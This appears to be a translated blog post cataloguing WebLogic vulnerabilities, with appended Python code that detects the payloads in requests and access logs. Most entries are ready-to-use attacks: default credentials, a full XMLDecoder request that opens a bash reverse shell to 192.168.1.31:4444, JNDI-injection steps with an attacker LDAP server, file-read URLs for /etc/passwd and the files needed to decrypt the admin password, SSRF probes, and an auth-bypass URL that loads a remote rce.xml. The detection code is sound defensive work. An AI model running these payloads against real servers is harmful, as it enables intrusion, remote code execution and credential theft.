WebLogic vulnerability summary

Columns of the original table: ID | Technical description | Exploit scenario / conditions | Process | References | Associated tools

S1  Weak-password vulnerability
Condition: the admin console login page is reachable.
Process:
2.1 Console login address
    Enter http://your-ip:7001/console to reach the admin console.
2.2 Common WebLogic weak credentials (user:password)
    system:password      weblogic:weblogic    admin:security
    joe:password         mary:password        system:security
    wlcsystem:wlcsystem  weblogic:Oracle@123
References:
    https://cirt.net/passwords?criteria=weblogic
    https://www.cnblogs.com/-mo-/p/11503707.html
Tools: https://github.com/rabbitmask/WeblogicScan
S2  Vulnerabilities based on the T3 protocol
CVEs: CVE-2015-4582, CVE-2016-0638, CVE-2016-3510, CVE-2018-2628, CVE-2020-2555, CVE-2020-2883
Process: these CVEs can be identified directly with the WebLogic scanner linked under Tools.
References: https://www.cnblogs.com/nice0e3/p/14201884.html
Tools: https://github.com/rabbitmask/WeblogicScan
S3  Vulnerabilities based on XML parsing (XMLDecoder)
CVEs: CVE-2017-3506, CVE-2017-10271
Condition: WebLogic 10.03
Process: the request below (an XMLDecoder payload carried in the WorkContext SOAP header):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.15:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.1.31/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

References:
    https://zhuanlan.zhihu.com/p/33403692
    https://blog.csdn.net/qq_29647709/article/details/84928306
Tools: https://github.com/rabbitmask/WeblogicScan
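
As an added example (not code from the original post or from WeblogicScan), the following Python parses a raw HTTP request to the wls-wsat endpoint and reports the XMLDecoder/ProcessBuilder structure that characterises the S3 payload, which is what a WAF rule or a request-log review should key on. The two requests in it are constructed for the demonstration and the host address is a placeholder; the code only parses the XML and never evaluates it.

```python
"""Inspect raw HTTP requests to the wls-wsat endpoint for XMLDecoder payloads of the
CVE-2017-3506 / CVE-2017-10271 kind.

Added example for this summary, not code from the original post or its linked tools.
Both requests below are constructed; the detector parses the XML and never executes it."""
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
# Classes that have no legitimate reason to appear inside a WorkContext header.
DANGEROUS_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}


def split_request(raw):
    """Split a raw request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    parts = request_line.split()
    method, path = parts[0], parts[1]
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_workcontext(body):
    """Return findings explaining why the SOAP header looks like an XMLDecoder payload."""
    findings = []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return findings  # not well-formed XML: nothing to inspect
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return findings
    for ctx in header.iter(f"{{{WORKAREA_NS}}}WorkContext"):
        for elem in ctx.iter():
            cls = elem.get("class")
            if elem.tag == "java" and cls == "java.beans.XMLDecoder":
                findings.append("java.beans.XMLDecoder document inside WorkContext")
            elif cls in DANGEROUS_CLASSES:
                findings.append(f"instantiation of {cls}")
            if elem.get("method") in ("start", "exec"):
                findings.append(f"method call {elem.get('method')!r}")
    return findings


def classify_request(raw):
    """Only requests to the wls-wsat services are inspected; everything else is passed through."""
    method, path, headers, body = split_request(raw)
    findings = inspect_workcontext(body) if path.startswith("/wls-wsat/") else []
    return {"method": method, "path": path, "malicious": bool(findings), "findings": findings}


# Constructed sample: same structure as the S3 payload, with a harmless command string.
SAMPLE_REQUEST = (
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n"
    "Host: 10.0.0.5:7001\r\n"          # placeholder host
    "Content-Type: text/xml\r\n"
    "\r\n"
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Header>"
    '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
    '<java version="1.4.0" class="java.beans.XMLDecoder">'
    '<void class="java.lang.ProcessBuilder">'
    '<array class="java.lang.String" length="1"><void index="0"><string>id</string></void></array>'
    '<void method="start"/></void></java>'
    "</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"
)
# Constructed sample: a legitimate-looking empty SOAP call to the same endpoint.
BENIGN_REQUEST = (
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\nHost: 10.0.0.5:7001\r\n\r\n"
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Header/><soapenv:Body/></soapenv:Envelope>"
)

if __name__ == "__main__":
    for req in (SAMPLE_REQUEST, BENIGN_REQUEST):
        print(classify_request(req))
```

The check is deliberately structural (XMLDecoder document, ProcessBuilder/Runtime instantiation, a start/exec call) rather than a string match on a particular command, so it also covers variants of the payload that change the command line or the encoding of the arguments.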
S4  Vulnerabilities based on IIOP
CVEs: CVE-2020-2551, CVE-2020-14644
Process: verify the vulnerability with the available PoC.
References: https://xz.aliyun.com/t/7422?page=1
Tools:
    https://github.com/Y4er/CVE-2020-2551
    https://github.com/rabbitmask/WeblogicScan
S5  Vulnerabilities based on LDAP (JNDI injection)
CVE: CVE-2021-2109
Affected versions:
    WebLogic Server 10.3.6.0.0
    WebLogic Server 12.1.3.0.0
    WebLogic Server 12.2.1.3.0
    WebLogic Server 12.2.1.4.0
    WebLogic Server 14.1.1.0.0
Process:
1. Unauthenticated access address: http://ip:7001/console/css/%252e%252e%252f/consolejndi.portal
2. Start the LDAP server: https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
   unzip JNDIExploit.v1.11.zip
   java -jar JNDIExploit.v1.11.jar -i ip    (ip = the attacking machine's address) starts it
3. Exploitation:

POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://81.70.146;55:1389/cqubba;AdminServer%22) HTTP/1.1
Host: ip:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

References: https://dyblogs.cn/dy/2404.html
Tools: https://github.com/welk1n/JNDI-Injection-Exploit
S6  Arbitrary file upload
Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
Process:
    begin.do page upload flaw:
        http://IP:7001/ws_utc/resources/ws/config/import?timestamp=1532403983779
    config.do page upload flaw; the address that actually carries the upload vulnerability:
        http://IP:7001/ws_utc/config.do
References: https://www.freebuf.com/vuls/178510.html

S7  Arbitrary file read + file upload
CVE: CVE-2019-2618
Affected versions: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
Process:
1. Arbitrary file read
   Request http://IP:7001/hello/file.jsp?path=/etc/passwd; the account and password data are read successfully.
   WebLogic stores passwords encrypted with AES (3DES in older versions). Symmetric encryption can be reversed, so all that is needed is the user's ciphertext and the key that was used at encryption time. Both live under base_domain, in the files SerializedSystemIni.dat and config.xml. SerializedSystemIni.dat is a binary file, so it must be read with Burp Suite; downloading it directly in a browser can introduce stray characters. In Burp, select the garbled string that comes back (this is the key) and right-click "copy to file" to save it as a file:
   http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
   config.xml is the global configuration file of base_domain, so it contains a lot of clutter; locate the relevant value in it, which is the encrypted administrator password (a separate tool has to be downloaded to decrypt it):
   http://yourIP:7001/hello/file.jsp?path=config/config.xml
References: https://www.jianshu.com/p/7d14e45a96e7
Tools: https://github.com/TideSec/Decrypt_Weblogic_Password
S8  SSRF
Affected versions: 10.0.2 ~ 10.3.6
Process: the operator parameter of SearchPublicRegistries.jsp is used as the SSRF target (the two requests below probe ports 1234 and 7001 on 127.0.0.1):

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:1234

http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

References:
    https://dyblogs.cn/dy/2275.html
    https://www.cnblogs.com/-mo-/p/11503707.html

S9  Authentication bypass + command execution (WebLogic CVE-2020-14882 / CVE-2020-14883)
Process:
1. Authentication bypass:
   http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
2. Command execution:
   http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
References:
    https://blog.csdn.net/weixin_28975553/article/details/116535611
    https://www.anquanke.com/post/id/221752
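
As an added example covering entries S5, S6, S8 and S9 (not code from the original post or from any tool it links), the following Python triages web-server access-log lines for the request shapes those entries describe: it undoes the stacked percent-encoding that the %252e%252e console bypass relies on, resolves the path the container will actually serve, checks handle parameters for the two handle classes named on this page, flags the uddiexplorer operator parameter when it targets an internal address, and records requests to the ws_utc endpoints. The log lines, client addresses and ports are constructed placeholders.

```python
"""Triage WebLogic access-log lines for the console path traversal (CVE-2020-14882/14883,
CVE-2021-2109), the uddiexplorer SSRF and the ws_utc upload endpoints.
Added example, not code from the original post or any tool it links; all log lines,
hosts and ports below are constructed placeholders."""
import ipaddress
import re
from urllib.parse import unquote, urlsplit

CONSOLE_STATIC = "/console/css/"  # static prefix the console serves without a login
UDDI_SEARCH = "/uddiexplorer/SearchPublicRegistries.jsp"
WS_UTC_ENDPOINTS = ("/ws_utc/config.do", "/ws_utc/resources/ws/config/import")
HANDLE_CLASSES = ("FileSystemXmlApplicationContext", "JndiBindingHandle")
LOG_RE = re.compile(r'"[A-Z]+ (?P<url>\S+) HTTP/\d\.\d"')


def fully_decode(value, rounds=3):
    """Undo stacked percent-encoding: %252e -> %2e -> '.' is what defeats the console ACL."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize_path(path):
    """Collapse '.' and '..' so we see the path the container will actually dispatch."""
    segments = []
    for seg in fully_decode(path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
        else:
            segments.append(seg)
    return "/" + "/".join(segments)


def parse_query(query):
    # Decoded by hand: handle values contain ';' and '(', which trip up parse_qs.
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[fully_decode(key)] = fully_decode(value)
    return params


def is_internal_host(host):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local


def analyze_url(url):
    """Return a list of findings for one request URL; an empty list means nothing suspicious."""
    parts = urlsplit(url)
    resolved = normalize_path(parts.path)
    params = parse_query(parts.query)
    findings = []
    # S5 / S9: enters through the unauthenticated static prefix but resolves outside it.
    if parts.path.startswith(CONSOLE_STATIC) and not resolved.startswith(CONSOLE_STATIC):
        findings.append(f"console traversal: {parts.path} resolves to {resolved}")
    for key, value in params.items():
        for cls in HANDLE_CLASSES:
            if cls in value:
                findings.append(f"parameter {key!r} references {cls}")
        if "handle" in key.lower() and ("ldap://" in value or "http://" in value):
            findings.append(f"parameter {key!r} points at an external resource")
    # S8: operator parameter aimed at an internal address.
    if resolved == UDDI_SEARCH and "operator" in params:
        target = urlsplit(params["operator"])
        if target.hostname and is_internal_host(target.hostname):
            findings.append(f"SSRF probe: operator -> {target.hostname}:{target.port}")
    # S6: the web-service test client is a development feature; record any use of it.
    if resolved in WS_UTC_ENDPOINTS:
        findings.append(f"ws_utc endpoint reached: {resolved}")
    return findings


def triage_log(lines):
    """Return (url, findings) for every log line that produced at least one finding."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        findings = analyze_url(match.group("url"))
        if findings:
            hits.append((match.group("url"), findings))
    return hits


LOG_LINES = [  # constructed sample in combined log format; 10.0.0.x are placeholders
    '10.0.0.9 - - [11/Oct/2021:15:35:01 +0800] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 4123',
    '10.0.0.9 - - [11/Oct/2021:15:35:02 +0800] "POST /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://example.com/rce.xml%22) HTTP/1.1" 200 0',
    '10.0.0.9 - - [11/Oct/2021:15:35:03 +0800] "POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.0.0.9:1389/x;AdminServer%22) HTTP/1.1" 200 0',
    '10.0.0.9 - - [11/Oct/2021:15:35:04 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=x&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1" 200 812',
    '10.0.0.9 - - [11/Oct/2021:15:35:05 +0800] "POST /ws_utc/config.do HTTP/1.1" 200 0',
    '10.0.0.7 - - [11/Oct/2021:15:36:00 +0800] "GET /console/css/console.css HTTP/1.1" 200 120',
]
```

Run it with python3 and print triage_log(LOG_LINES): the first five sample lines each produce findings and the plain stylesheet request produces none. Matching on the resolved path rather than on the literal "%252e" string is the point: the same normalisation catches single-encoded, double-encoded and mixed-case variants, and it is the resolved target (console.portal, consolejndi.portal) that tells you which entry on this page the request corresponds to.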


Posted 2021-10-11 15:35 by 梦幻泡影离殇